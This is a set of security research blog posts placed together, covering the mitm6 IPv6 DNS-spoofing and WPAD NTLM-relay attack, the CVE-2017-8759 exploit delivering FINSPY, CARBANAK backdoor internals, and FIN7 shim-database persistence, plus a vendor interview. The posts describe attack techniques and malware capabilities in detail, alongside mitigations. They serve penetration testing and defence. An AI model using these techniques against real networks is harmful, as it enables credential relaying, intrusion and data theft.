While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described by in 2011 by Alex Waters from the Infosec institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network by setting up a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test since this rapidly destabilizes the network. Additionally the attack requires quite a few external packages and services to work. mitm6 is a tool which focusses on an easy to setup solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network’s regular operation. The result is a python script which requires almost no configuration to set up, and gets the attack running in seconds. When the attack is stopped, the network reverts itself to it’s previous state within minutes due to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts with listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attackers IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker’s IP as DNS server. Optionally it will periodically send Router Advertisment (RA) messages to alert client that there is an IPv6 network in place and that clients should request an IPv6 adddress via DHCPv6. This will in some cases speed up the attack but is not required for the attack to work, making it possible to execute this attack on networks that have protection against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as DNS server. Due to the preference of Windows regarding IP protocols, the IPv6 DNS server will be preferred to the IPv4 DNS server. The IPv6 DNS server will be used to query both for A (IPv4) and AAAA (IPv6) records.


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is getting the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. On the screenshot in step 1 you see the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the part we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection feature has been a much debated one, and one that has been abused by penetration testers for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which provides this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attackers server, and then prompt for authentication to access the WPAD file. This authentication was provided by default by Windows without requiring user interaction. This could provide the attacker with NTLM credentials from the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

In 2016 however, Microsoft published a security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can just reply with its own IP address (either IPv4 or IPv6 depending on what the victim’s machine asks for). This also works if the organization is already using a WPAD file (though in this case it will break any connections from reaching the internet).

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file we won’t request authentication, but instead provide it with a valid WPAD file where the attacker’s machine is set as a proxy. When the victim now runs any application that uses the Windows API to connect to the internet or simply starts browsing the web, it will use the attackers machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
Now when the victim connects to our “proxy” server, which we can identify by the use of the CONNECT HTTP verb, or the presence of a full URI after the GET verb, we reply with a HTTP 407 Proxy Authentication required. This is different from the HTTP code normally used to request authentication, HTTP 401.
IE/Edge and Chrome (which uses IEs settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim on services, access information on websites and shares, and if the victim has enough privileges, the attacker can even execute code on computers or even take over the entire Windows Domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the global idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients querying for a DHCPv6 server and make it impossible to take over the DNS server with the above described method.
For the WPAD exploit, the best solution is to disable the Proxy Auto detection via Group Policy. If your company uses a proxy configuration file internally (PAC file) it is recommended to explicitly configure the PAC url instead of relying on WPAD to detect it automatically.
While writing this blog, Google Project Zero also discovered vulnerabilities in WPAD, and their blog post mentions that disabling the WinHttpAutoProxySvc is the only reliable way that in their experience disabled WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

What role did the free version of your product, available at, play in the company’s evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends or to look-up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, focusing on what matters and enabling effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders or advisors, in a saturated high-tech market that is extremely fast paced and full of money, it seemed impossible to succeed on paper. But the reality is: if you are offering a product or service that is solving a real-world problem considerably better than the market leaders, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas, but be prepared to work 80 hours a week, have the right technology, the feedback from the community, amazing team members and lean on insightful advisors and you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ( - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage.  Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named “left.jpg,” which in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name


Key logger

Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber

Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor

Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor

Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor

Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Command Hash

Command Name




Runs each command specified in the configuration file (see the Configuration section).



Updates the state value (see the Configuration section).



Desktop video recording



Downloads executable and injects into new process



Ammyy Admin tool



Updates self



Add/Update klgconfig (analysis incomplete)



Starts HTTP proxy



Renders computer unbootable by wiping the MBR



Reboots the operating system



Creates a network tunnel



Adds new C2 server or proxy address for pseudo-HTTP protocol



Adds new C2 server for custom binary protocol



Creates or deletes Windows user account



Enables concurrent RDP (analysis incomplete)



Adds Notification Package (analysis incomplete)



Deletes file or service



Adds command to the configuration file (see the Configuration section)



Downloads executable and injects directly into new process



Send Windows accounts details to the C2 server



Takes a screenshot of the desktop and sends it to the C2 server



Backdoor sleeps until specified date






Upload files to the C2 server



Runs VNC plugin



Runs specified executable file



Uninstalls backdoor



Returns list of running processes to the C2 server



Change C2 protocol used by plugins



Download and execute shellcode from specified address



Terminates the first process found specified by name



Initiates a reverse shell to the C2 server



Plugin control



Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol, we have discovered that the message bodies that are stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date































Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active now to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk as we discussed above and are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
